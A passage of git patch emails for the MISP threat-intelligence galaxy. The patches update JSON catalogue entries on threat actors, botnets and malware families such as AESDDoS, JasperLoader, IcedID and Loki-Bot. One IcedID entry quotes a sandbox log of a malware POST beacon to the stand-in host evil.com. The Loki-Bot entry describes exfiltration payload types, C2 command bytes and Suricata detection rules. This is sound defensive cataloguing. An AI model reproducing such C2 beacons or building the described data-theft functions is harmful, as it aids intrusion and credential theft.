"synonyms": [ - "Wolf Spider" + "Wolf Spider" ] }, "uuid": "ff449346-aa9f-45f6-b482-71e886a5cf57", From 0afaf814380cc70eb3e7ecf673ec0655bb2ab371 Mon Sep 17 00:00:00 2001 From: Rony <49360849+r0ny123@users.noreply.github.com> Date: Wed, 1 May 2019 15:54:38 +0530 Subject: [PATCH 24/50] Update threat-actor.json --- clusters/threat-actor.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index 0ce1a0f..e952332 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -8,7 +8,7 @@ ], "category": "actor", "description": "Known or estimated adversary groups targeting organizations and employees. Adversary groups are regularly confused with their initial operation or campaign.", - "name": "Threat actor",226 + "name": "Threat actor", "source": "MISP Project", "type": "threat-actor", "uuid": "7cdff317-a673-4474-84ec-4f1754947823", From 37da9bebdf3d177e047de48279c8fe50d78346c0 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Wed, 1 May 2019 17:41:03 +0200 Subject: [PATCH 25/50] chg: [threat-actor] FIN4 updates --- clusters/threat-actor.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index e952332..7e79a6e 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -2630,11 +2630,11 @@ "https://pwc.blogs.com/cyber_security_updates/2015/06/unfin4ished-business.html" ], "synonyms": [ - "Wolf Spider" + "FIN4" ] }, "uuid": "ff449346-aa9f-45f6-b482-71e886a5cf57", - "value": "FIN4" + "value": "Wolf Spider" }, { "description": "First observed activity in December 2013.", From f51f13e84bbea7bcc2e4fea60e5f56cb23499ce3 Mon Sep 17 00:00:00 2001 From: Deborah Servili Date: Thu, 2 May 2019 10:15:26 +0200 Subject: [PATCH 26/50] add AESDDoS Botnet --- clusters/botnet.json | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/clusters/botnet.json b/clusters/botnet.json index a57b2bf..545602e 100644 --- a/clusters/botnet.json +++ b/clusters/botnet.json @@ -1147,7 +1147,17 @@ }, "uuid": "f387e30a-dc48-11e8-b9f4-370bc63008bf", "value": "Chalubo" + }, + { + "description": "Our honeypot sensors recently detected an AESDDoS botnet malware variant (detected by Trend Micro as Backdoor.Linux.AESDDOS.J) exploiting a server-side template injection vulnerability (CVE-2019-3396) in the Widget Connector macro in Atlassian Confluence Server, a collaboration software program used by DevOps professionals.", + "meta": { + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/aesddos-botnet-malware-exploits-cve-2019-3396-to-perform-remote-code-execution-ddos-attacks-and-cryptocurrency-mining/" + ] + }, + "uuid": "809d100b-d46d-40f4-b498-5371f46bb9d6", + "value": "AESDDoS" } ], - "version": 19 + "version": 20 } From dda2ede5f25f56640bfedbaaab1758d57d38f9f2 Mon Sep 17 00:00:00 2001 From: Deborah Servili Date: Thu, 2 May 2019 13:02:00 +0200 Subject: [PATCH 27/50] add JasperLoader --- clusters/tool.json | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/clusters/tool.json b/clusters/tool.json index 8493546..9fb9806 100644 --- a/clusters/tool.json +++ b/clusters/tool.json @@ -7660,7 +7660,17 @@ }, "uuid": "50baa4dc-0667-4b47-b4aa-374a2743f409", "value": "Cowboy" + }, + { + "description": "JasperLoader employs a multi-stage infection process that features several obfuscation techniques that make analysis more difficult. It appears that this loader was designed with resiliency and flexibility in mind, as evidenced in later stages of the infection process. ", + "meta": { + "refs": [ + "https://blog.talosintelligence.com/2019/04/jasperloader-targets-italy.html?m=1" + ] + }, + "uuid": "d8de6b56-9950-4389-83b8-4fc3262dc4c9", + "value": "JasperLoader" } ], - "version": 118 + "version": 119 } From b706738d4676ffc230dcc33c94f63508c8e92a67 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Thu, 2 May 2019 14:47:00 +0200 Subject: [PATCH 28/50] chg: [malpedia] jq all the things --- clusters/malpedia.json | 32 ++++++++++++++++---------------- 1 file changed, 16 insertions(+), 16 deletions(-) diff --git a/clusters/malpedia.json b/clusters/malpedia.json index 28bd70b..c2c2e22 100644 --- a/clusters/malpedia.json +++ b/clusters/malpedia.json @@ -1032,7 +1032,7 @@ "value": "Triada" }, { - "description": "Bitdefender described Triout as a Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware\u2019s surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recoding videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.", + "description": "Bitdefender described Triout as a Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware’s surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recoding videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.triout", @@ -2307,7 +2307,7 @@ "value": "Bateleur" }, { - "description": "\u2022 BELLHOP is\ta JavaScript backdoor interpreted using the native Windows Scripting Host(WSH).\r\nAfter performing some basic host information gathering, the BELLHOP dropper\tdownloads a base64-encoded blob of JavaScript to disk and\tsets\tup persistence in three ways:\r\n\u2022 Creating a Run key in the Registry\r\n\u2022 Creating a RunOnce key in the Registry\r\n\u2022 Creating a persistent named scheduled task\r\n\u2022 BELLHOP communicates using HTTP\tand HTTPS with primarily benign sites such as Google\tDocs and PasteBin.\r\n", + "description": "• BELLHOP is\ta JavaScript backdoor interpreted using the native Windows Scripting Host(WSH).\r\nAfter performing some basic host information gathering, the BELLHOP dropper\tdownloads a base64-encoded blob of JavaScript to disk and\tsets\tup persistence in three ways:\r\n• Creating a Run key in the Registry\r\n• Creating a RunOnce key in the Registry\r\n• Creating a persistent named scheduled task\r\n• BELLHOP communicates using HTTP\tand HTTPS with primarily benign sites such as Google\tDocs and PasteBin.\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.bellhop", @@ -3082,7 +3082,7 @@ "value": "Patcher" }, { - "description": "Backdoor as a fork of OpenSSH_6.0 with no logging, and \u201c-P\u201d and \u201c-z\u201d hidden command arguments. \u201cPuffySSH_5.8p1\u201d string.", + "description": "Backdoor as a fork of OpenSSH_6.0 with no logging, and “-P” and “-z” hidden command arguments. “PuffySSH_5.8p1” string.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pintsized", @@ -3784,7 +3784,7 @@ "value": "Acronym" }, { - "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim\u2019s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.", + "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim’s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.adam_locker", @@ -3878,7 +3878,7 @@ "value": "Agent Tesla" }, { - "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine\u2019s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system.", + "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine’s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aldibot", @@ -5264,7 +5264,7 @@ "value": "BreachRAT" }, { - "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\\u0445\u043f-\u043f\u0440\u043e\u0431\u0438\u0432\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n", + "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\хп-пробив\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader" @@ -6674,7 +6674,7 @@ "value": "Dairy" }, { - "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on \u201cquality over quantity\u201d in email-based threats. DanaBot\u2019s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. ", + "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBot’s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot", @@ -6942,7 +6942,7 @@ "value": "DeriaLock" }, { - "description": " A DLL backdoor also reported publicly as \u201cDerusbi\u201d, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.", + "description": " A DLL backdoor also reported publicly as “Derusbi”, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi", @@ -9032,7 +9032,7 @@ "value": "Graftor" }, { - "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card\u2019s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system\u2019s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.", + "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card’s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system’s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos", @@ -9634,7 +9634,7 @@ "value": "HyperBro" }, { - "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If \u201c/i\u201d is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If \u201c/I\u201d is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2", + "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid", @@ -9801,7 +9801,7 @@ "value": "InvisiMole" }, { - "description": " IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control (CnC) server and uniform resource locator (URL) path.\r\n The encoded payload is written to a temporary file, decoded and executed in a hidden window. The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively, where [%rand%] is a 4-byte hexadecimal number based on the current timestamp. It persists by copying itself to the current user\u2019s Startup folder.", + "description": " IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control (CnC) server and uniform resource locator (URL) path.\r\n The encoded payload is written to a temporary file, decoded and executed in a hidden window. The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively, where [%rand%] is a 4-byte hexadecimal number based on the current timestamp. It persists by copying itself to the current user’s Startup folder.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ironhalo", @@ -10947,7 +10947,7 @@ "value": "LockPOS" }, { - "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as \u201cTrojan.Nymeria\u201d, although the connection is not well-documented.", + "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as “Trojan.Nymeria”, although the connection is not well-documented.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.loda", @@ -11002,7 +11002,7 @@ "value": "LoJax" }, { - "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of \u2018-u\u2019 that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: \u201cB7E1C2CC98066B250DDB2123\u201c.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: \u201c%APPDATA%\\ C98066\\\u201d.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: \u201c.exe,\u201d \u201c.lck,\u201d \u201c.hdb\u201d and \u201c.kdb.\u201d They will be named after characters 13 thru 18 of the Mutex. For example: \u201c6B250D.\u201d Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically \u201cckav.ru\u201d. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot\u2019s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2", + "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of ‘-u’ that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: “B7E1C2CC98066B250DDB2123“.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: “%APPDATA%\\ C98066\\”.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: “.exe,” “.lck,” “.hdb” and “.kdb.” They will be named after characters 13 thru 18 of the Mutex. For example: “6B250D.” Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically “ckav.ru”. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot’s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit 